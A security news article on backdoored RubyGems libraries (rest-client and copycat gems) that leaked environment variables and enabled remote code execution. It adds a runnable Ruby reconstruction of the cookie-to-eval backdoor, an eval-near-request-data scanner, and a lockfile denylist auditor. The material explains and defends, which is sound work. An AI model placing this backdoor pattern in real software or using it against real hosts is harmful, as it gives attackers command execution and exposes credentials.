Malware

Stop programming in Ruby, applications using Ruby libraries have a backdoor

The RubyGems package repository maintenance team recently announced the removal of at least 18 malicious versions of 11 Ruby libraries after a backdoor was found in them. Web application security experts add that some Ruby projects were also found to be infected with cryptocurrency mining malware. The malicious code was discovered just a couple of days ago in four versions of rest-client, a very popular Ruby library.

Backdoor

Reports indicate that the malicious code collects URLs and environment variables from the affected system and sends them to a remote server located in Ukraine. Environment variables are where many deployments keep secrets, which is why the leak matters: “The data most exposed to this leak is login credentials used to access databases, payment systems and other platforms,” says Jan Dintel, Ruby maintainer.

As for the backdoor itself, web application security experts explain that it lets a threat actor send a specially crafted cookie in an HTTP request to a web application that loads the compromised library. The injected code evaluates the cookie's contents as Ruby, which gives the attacker remote command execution on the host running the project.
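The mechanism described above, as an added, simplified reconstruction in Ruby. This is not the code that was injected into rest-client and not code from this article: a Rack-style middleware that decodes a base64 cookie and hands it to eval, plus a heuristic auditor that flags source lines where request data reaches a dynamic-execution call. The cookie name `__session`, the request environments and the sample gem source are constructed for this example.

```ruby
require "base64"

# Cookie name the backdoor listens for: an assumption for this example,
# not the name used by the real malicious code.
BACKDOOR_COOKIE = "__session"

# Parses a raw Cookie header ("a=1; b=2") into a Hash of name => value.
def parse_cookies(header)
  return {} if header.nil? || header.empty?
  header.split(/;\s*/).each_with_object({}) do |pair, acc|
    name, value = pair.split("=", 2)
    acc[name] = value.to_s
  end
end

# Rack-style middleware (a Rack app is any object responding to #call(env)).
# Simplified reconstruction of the pattern the article describes: ordinary
# requests pass through untouched, but a request carrying the magic cookie
# has that cookie's contents decoded and evaluated as Ruby.
class BackdooredMiddleware
  def initialize(app)
    @app = app
  end

  def call(env)
    cookies = parse_cookies(env["HTTP_COOKIE"])
    if (blob = cookies[BACKDOOR_COOKIE])
      code = Base64.decode64(blob)   # attacker-controlled request data ...
      result = eval(code)            # ... handed straight to eval: remote code execution
      return [200, { "Content-Type" => "text/plain" }, [result.to_s]]
    end
    @app.call(env)
  end
end

# Drives the middleware with a benign request and a crafted one. The payload
# "6 * 7" stands in for attacker code; a real one would spawn a shell or a miner.
def demo_backdoor
  app = ->(_env) { [200, { "Content-Type" => "text/plain" }, ["hello"]] }
  stack = BackdooredMiddleware.new(app)
  benign = { "HTTP_COOKIE" => "theme=dark" }
  payload = Base64.strict_encode64("6 * 7")
  crafted = { "HTTP_COOKIE" => "theme=dark; #{BACKDOOR_COOKIE}=#{payload}" }
  [stack.call(benign)[2].first, stack.call(crafted)[2].first]
end

# Heuristic auditor for installed gems: returns 1-based line numbers where a
# dynamic-execution call appears within `window` lines after request data
# (cookies, params, the Rack env) is touched. Noisy by design; review hits by hand.
DYNAMIC_EXEC = /\b(eval|instance_eval|class_eval|module_eval)\b/
REQUEST_DATA = /HTTP_COOKIE|cookies|params|env\[/

def suspicious_eval_sites(source, window: 3)
  lines = source.lines
  lines.each_index.select do |i|
    lines[i].match?(DYNAMIC_EXEC) &&
      lines[[i - window, 0].max..i].any? { |l| l.match?(REQUEST_DATA) }
  end.map { |i| i + 1 }
end

# Constructed sample of what a backdoored gem file might contain.
SAMPLE_GEM_SOURCE = <<~RUBY
  class Sendfile
    def call(env)
      cookies = parse(env["HTTP_COOKIE"])
      payload = Base64.decode64(cookies["__session"].to_s)
      eval(payload)
    end
  end
RUBY

if __FILE__ == $PROGRAM_NAME
  p demo_backdoor                              # ["hello", "42"]
  p suspicious_eval_sites(SAMPLE_GEM_SOURCE)   # [5]
  # To sweep every installed gem, feed each file to the auditor:
  # Dir.glob(File.join(Gem.dir, "gems", "**", "*.rb")).each do |f|
  #   hits = suspicious_eval_sites(File.read(f))
  #   puts "#{f}: #{hits.inspect}" unless hits.empty?
  # end
end
```

The benign request never touches eval, which is why such a backdoor can sit in production traffic unnoticed: only a request that already knows the cookie name triggers it. The auditor is a triage aid, not a proof of absence; a grep for eval near request data would have surfaced this case, but an obfuscated payload fetched at runtime would not match it.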

RubyGems maintainers also found that the attackers were abusing the same mechanism to inject cryptocurrency-mining malware into some projects, such as:

  • rest-client, downloaded 176 times
  • bitcoin_vanity, downloaded 8 times
  • lita_coin, downloaded 216 times
  • coming-soon, downloaded 211 times
  • omniauth_amazon, downloaded 193 times

All of these libraries except rest-client were created by taking another fully functional library, adding the malicious code and re-uploading the result to RubyGems under a different name. The people responsible remained active on RubyGems for more than a month without anyone detecting their presence or actions.

The operators of this campaign were finally detected after they gained access to the account of one of the rest-client developers and used it to push four malicious versions of the library to RubyGems. For web application security specialists, the threat actors made a serious mistake by targeting such a prominent RubyGems project, which has more than 113 million downloads. “This drew too much attention, so the scheme was dismantled a few hours after this activity was detected,” they added.

Despite the quick response from the rest-client maintainers, the 18 malicious versions across the affected libraries were downloaded about 3,600 times before being removed from the platform, so the problem is not over for anyone who installed them.

International Institute of Cyber Security (IICS) web application security experts recommend that administrators of projects using these libraries remove the malicious version or, where necessary, upgrade or downgrade to a version that is safe to use. Other researchers have found similar backdoors on RubyGems before, specifically in the bootstrap-sass and strong_password projects. Although the cases are somewhat similar, researchers have not yet determined whether there is any link between them.
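A lockfile audit for the remediation advice above, as an added example written for this article (not IICS or RubyGems tooling): it parses the resolved gems out of a Gemfile.lock and flags any that hit a denylist. The Gemfile.lock text is constructed. The denylist uses the gem names from this article, with the copycat gems flagged at any version (every published version was malicious) and rest-client limited to the 1.6.10 to 1.6.13 range named in the RubyGems advisory for this incident; the article itself does not list those versions, so confirm them against the advisory before relying on them.

```ruby
# Constructed denylist for this example: name => :any, or name => [versions].
# The rest-client range is taken from the RubyGems advisory for this incident
# (the article does not list it); verify it against the advisory before use.
MALICIOUS = {
  "rest-client"     => %w[1.6.10 1.6.11 1.6.12 1.6.13],
  "bitcoin_vanity"  => :any,
  "lita_coin"       => :any,
  "coming-soon"     => :any,
  "omniauth_amazon" => :any,
}.freeze

# Parses every "specs:" block of a Gemfile.lock and returns {name => version}
# for each resolved gem. Resolved gems are the 4-space-indented "name (version)"
# lines; the 6-space-indented lines beneath them are dependency constraints.
def parse_lockfile(text)
  resolved = {}
  in_specs = false
  text.each_line do |line|
    if line.match?(/\A\s*specs:\s*\z/)
      in_specs = true
      next
    end
    in_specs = false if line.strip.empty? || line.match?(/\A\S/)
    next unless in_specs
    if (m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/))
      resolved[m[1]] = m[2]
    end
  end
  resolved
end

# Returns [[name, version], ...] for resolved gems that hit the denylist.
def flag_malicious(resolved, denylist = MALICIOUS)
  resolved.select do |name, version|
    bad = denylist[name]
    bad == :any || (bad.is_a?(Array) && bad.include?(version))
  end.to_a
end

# Constructed Gemfile.lock: one copycat gem and a rest-client pin inside the
# affected range, plus an unrelated gem that must not be flagged.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      coming-soon (0.1.3)
      mime-types (3.3)
      rest-client (1.6.13)
        mime-types (>= 1.16)

  PLATFORMS
    ruby

  DEPENDENCIES
    coming-soon
    rest-client
LOCK

if __FILE__ == $PROGRAM_NAME
  # Swap SAMPLE_LOCKFILE for File.read("Gemfile.lock") to audit a real project.
  flag_malicious(parse_lockfile(SAMPLE_LOCKFILE)).each do |name, version|
    puts "FLAGGED #{name} #{version}"   # coming-soon 0.1.3, rest-client 1.6.13
  end
end
```

A hit on a copycat gem means removing it from the Gemfile entirely, since there is no clean version to move to; a hit on rest-client means pinning to a version outside the affected range and regenerating the lockfile. Because the malicious versions also exfiltrated environment variables, any credentials exposed to a process that loaded them should be rotated, not just the dependency fixed.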
